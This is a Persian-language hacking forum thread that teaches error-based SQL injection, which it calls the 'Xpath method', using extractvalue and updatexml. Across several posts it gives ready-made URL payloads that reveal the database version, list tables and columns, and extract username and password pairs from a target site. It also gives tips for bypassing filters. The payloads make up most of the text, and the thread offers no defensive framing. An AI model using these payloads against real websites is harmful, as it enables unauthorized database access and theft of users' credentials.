رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

 با سلام خدمت دوستان عزیز در این تاپیک قصد دارم به شما متد Xpath رو آموزش بدهم . 

Xpath injection

 

 

کاربرد :

 

1.    مثلا زمانی که در دستور +order+by+99999-- عدد 1 هم که می زنید صفحه لود نمی شود باید از این متد استفاده کنید .

2.    زمانی که به ارورnumber of column  the diffrent باید از این متد استفاده کنید . 

3.    زمانی که union…. را می زنید و با وجود اینکه تعداد درست است ولی به شما ستون  اسیب پذیر را نشان ندهد .

4.     و.....

 -------------- -------------- --------------

روش استفاده از متد xpath

 

اول از بایپس هایی که بلدید استفاده کنید مثل : منفی پشت عدد ، source ، بزرگ کردن حروف و ....

 اگر مشکل حل نشد به سراغ این متد میاید .

آموزش متد xpath :

 

بدست اوردن ورژن : 

 

…..?sa=12+and+extractvalue(rand(),concat(0x7e,version()))--

 

0x7e به معنای علامت (~) است .

version() به معنای ورژن سایت است.

در آموزش بعدی به شما بیرون کشیدن تیبل ها را آموزش می دهم .

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

خب همانطور که گفتم در این آموزش قرار است به شما بیرون کشیدن تیبل ها را در متد Xpath آموزش دهم. 

بدست اوردن تیبل ها :‌

 

…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+limit+0,1)))--

select : برای نمایش ،

 table_name : نام تیبل ،

: from+information_schema.tables  در تیبل های این قسمت  ، 

limit 0,1 برای شمردن تیبل ها . 

 

برای شمردن یکی یکی عدد limit (توجه ولیوی اول یعنی 0) را زیاد کنید .

و اینکه 0 که گذاشتیم خودش معنای ۱ را می دهد . 

 

  برای محدود کردن تیبل ها که تیبل های پیش فرض را نشان ندهد :

 

…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))--

و مثل بالا یکی یکی limit را اضافه می کنید .  

. در آموزش بعدی به شما بیرون کشیدن ستون ها را آموزش می دهم 

. دوستان توجه داشته باشند که من فایل ورد متد ها رو دارم و هر که نیاز داشت به من پیام بدهد 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

بیرون کشیدن ستون ها :

 

 

…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name={hex = table name mohem}+limit+0,1)))--

به جای هکز مساوی با تیبل نیم مهم نام تیبل را به صورت هکز بنویسید . (با 0x )

و برای اینکه تمام ستون ها را بیرون بکشید باید یکی یکی عدد limit را زیاد کنید . 

-----------------

مثال : 

 

ستون اول =

…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name={hex = table name mohem}+limit+0,1)))--

ستون دوم =

…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name={hex = table name mohem}+limit+1,1)))--

 

ستون سوم = 

…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name={hex = table name mohem}+limit+2,1)))--

و....

 

----------- ----------- ----------- -----------

 

بیرون کشیدن username و password :‌

 

…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+concat(username,0x3a,passworsd)+from+{ table name mohem }+limit+0,1)))--

 

 

در قسمت تیبل نیم مهم نام تیبل مهم خود را بدون هکز کردن بنویسید .

 

----------------------------------------------------------------------------------------------------------------

نکته : اگر یک زمان سایت به extractvalue حساس بود یا به هر ارور دریافت کردید می توانید از جاگزین ان استفاده کنید یعنی

 

updatexml

 

برا اینکه بفهمید بر روی سایت updatexml کار می کند باید اول این دستور را بزنید :‌

 

Site.com/news.php?ID=23+and+updatexml()--

 

و اگر خطایی دریافت کردید مثل : 

 

Incorrect parameter count in the call to native function “updatexml()”

یعنی سایت به updatexml حساس نیست . 

 

و اولین دستور برای بدست اوردن ورژن :‌

 

…..?ID=23+and+updatexml(null,concat(0x3a,version()),null)--

 

 

و بیرون کشیدن تیبل ها و محدود سازی دیتابیس :

 

…..?ID=23+and+updatexml(null,concat(0x3a,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)),null)--

 

برای نشان دادن تیبل های بعدی ولیوی اول limit را اضافه کنید . (توجه داشته باشید که خود صفر تیبل اول است )

 

 

بیرون کشیدن ستون ها :

 

…..?ID=23+and+updatexml(null,concat(0x3a,(select+column_name+from+information_schema.columns+where+table_name={hex = table name mohem}+limit+0,1)),null)--

 

و برای نشان دادن ستون مهم لیمیت را یکی یکی اضافه کنید و به جای {hex = table name mohem} هکز شده ی تیبل مهم خود را بگذارید .

 

 

بیرون کشیدن password و username : 

…..?ID=23+and+updatexml(null,concat(0x3a,(select+concat(username,0x3a,passwor)+from+{table name}limit+0,1)),null)--

 

 به جای تیبل نیم نام تیبل را بنویسید بدون هکز کردن و به جای یوزرنیم و پسورد نام دو ستون مهم را بنویسید و یکی یکی لیمیت را زیاد کنید تا یوزر و پسورد بعدی را نمایش دهد.  

امیدوارم لذت برده باشید و سعی کردم بیشتر توضیحات رو بدم و پست چند بخشی نشود . 

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...